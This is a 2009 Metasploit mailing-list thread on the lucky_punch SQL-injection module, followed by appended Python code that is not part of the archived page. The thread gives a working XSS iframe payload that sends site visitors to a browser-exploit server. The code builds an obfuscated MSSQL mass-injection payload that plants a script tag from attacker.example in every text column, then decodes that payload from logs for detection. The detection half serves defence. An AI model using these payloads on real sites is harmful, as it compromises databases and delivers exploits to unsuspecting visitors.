Metasploit mailing list archives

lucky punch


From: dkennedy at securestate.com (David Kennedy)
Date: Thu, 2 Apr 2009 11:46:38 -0400

If you're using XSS, it's easy to use the Metasploit clientpwn and just put an iframe in the XSS to load on port 80 on 
your affected host:

http://xssvulnsite/Default.aspx?msg=<iframe src="http://clienpwnsystem" width="0" height="0" scrolling="no"></iframe>

This would launch the site as normal and put an iframe that redirects toward the attacker's system. Obviously you don't 
have to use clientpwn; you can pick whatever exploit you want, however the user-agent functions with clientpwn are nice.

Very simplistic attack for code execution on the affected browser...



________________________________
From: rogue <wullie19 at ntlworld.com>
Date: Thu, 2 Apr 2009 11:40:21 -0400
To: Efrain Torres <etlownoise at gmail.com>
Cc: <framework at spool.metasploit.com>
Subject: Re: [framework] lucky punch

Hi there

Thanks for your help. I've been looking at XSS to redirect someone from a web
page to my server to launch some sort of browser attack. So this module uses
SQL injection on MSSQL to achieve that?

-rogue




Rogue,

What are you trying to do with the module? Can you please provide more
details so I can help you better? Basically the module is used to
perform, through SQL injection (MSSQL), the modification of database tables
to store JavaScript code that may be displayed by an application to
redirect the user to a compromised webserver.

ET

On Thu, Apr 2, 2009 at 9:37 AM, rogue <wullie19 at ntlworld.com> wrote:
Hi list.

Can anyone give me some info on how the auxiliary module
scanner/http/lucky_punch.rb is used?

Thanks
-rogue


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

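As an added illustration of the technique ET describes (this is not code from the thread or from the lucky_punch module, which the page never shows), the following Python sketch builds the kind of T-SQL block such an attack pushes through an MSSQL injection point: a cursor over sysobjects/syscolumns that appends a script tag to every text-typed column, so any page that later renders those rows loads JavaScript from the attacker's host. It also shows the hex-encoded CAST(0x...) wrapper that in-the-wild mass-injection campaigns of that period used, and the defensive counterpart a responder wants: decoding that wrapper out of a web-server log line and recovering the injected script URL. The host name attacker.example, the log line and the column-type list are constructed for the example; the code only builds and parses strings and never touches a database.

```python
"""Added illustration of the technique ET describes: a T-SQL block, delivered
through a SQL injection point, that walks every user table in an MSSQL
database and appends a <script> tag to every text-typed column, so pages that
later render those rows pull JavaScript from an attacker-controlled host.
The second half is the defensive counterpart: decoding the hex-wrapped form
of such a payload from a web-server log line and recovering the script URL.

Constructed for illustration only: this is not the lucky_punch module's code,
and it only builds and parses strings; it never connects to a database.
"""
import re
import urllib.parse
from typing import List, Optional

# MSSQL system type ids for the columns worth poisoning (syscolumns.xtype):
# 35 = text, 99 = ntext, 167 = varchar, 231 = nvarchar
TEXT_XTYPES = (35, 99, 167, 231)


def build_mass_update_tsql(redirect_host: str) -> str:
    """Return a T-SQL cursor loop that appends a script tag to every text column.

    The inner UPDATE is itself a string handed to EXEC, so its quotes are
    doubled; the script tag uses double quotes so it survives that nesting.
    """
    script_tag = f'<script src="http://{redirect_host}/x.js"></script>'
    xtype_filter = " OR ".join(f"b.xtype={t}" for t in TEXT_XTYPES)
    return (
        "DECLARE @T varchar(255),@C varchar(255) "
        "DECLARE Table_Cursor CURSOR FOR "
        "SELECT a.name,b.name FROM sysobjects a,syscolumns b "
        f"WHERE a.id=b.id AND a.xtype='u' AND ({xtype_filter}) "
        "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
        "WHILE(@@FETCH_STATUS=0) BEGIN "
        "EXEC('UPDATE ['+@T+'] SET ['+@C+']="
        f"RTRIM(CONVERT(varchar(4000),['+@C+']))+''{script_tag}''') "
        "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
        "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
    )


def hex_wrap(tsql: str) -> str:
    """Hide the block behind CAST(0x... AS VARCHAR) so the request carries no
    SQL keywords beyond DECLARE/CAST/EXEC; EXEC(@S) then runs the decoded text.
    The leading ';' ends the application's own statement, '--' drops the rest.
    """
    hexed = tsql.encode("latin-1").hex().upper()
    return f";DECLARE @S VARCHAR(4000);SET @S=CAST(0x{hexed} AS VARCHAR(4000));EXEC(@S);--"


HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"""<script\s+src=["']?([^"'\s>]+)""", re.IGNORECASE)


def decode_hex_cast(request_line: str) -> Optional[str]:
    """URL-decode a logged request and decode the first CAST(0x...) literal in it."""
    decoded = urllib.parse.unquote_plus(request_line)
    match = HEX_CAST.search(decoded)
    if match is None:
        return None
    return bytes.fromhex(match.group(1)).decode("latin-1", errors="replace")


def extract_injected_script_urls(request_line: str) -> List[str]:
    """Script URLs embedded in the decoded payload, or [] if the line carries none."""
    tsql = decode_hex_cast(request_line)
    return SCRIPT_SRC.findall(tsql) if tsql is not None else []


def demo() -> List[str]:
    """Build a payload, embed it in a constructed IIS-style log line, and detect it."""
    payload = hex_wrap(build_mass_update_tsql("attacker.example"))
    # Constructed log entry (not a real capture): the payload rides in a numeric parameter.
    log_line = ("2009-04-02 15:46:38 10.0.0.5 GET /Default.aspx id=1"
                + urllib.parse.quote(payload, safe="")
                + " 80 - 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+7.0) 200")
    return extract_injected_script_urls(log_line)


if __name__ == "__main__":
    print(demo())
```

The two halves mirror each other: whatever a web application lets through unparameterised into `EXEC`, a log reviewer can recover by URL-decoding the request and hex-decoding the `CAST(0x...)` literal, which is usually the quickest way to find out which host the poisoned rows are now pointing visitors at. The actual payload the module sends may differ in detail from this sketch; the column-type filter and the `RTRIM(CONVERT(...))` concatenation are one plausible form of the technique, not a quotation of the module.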
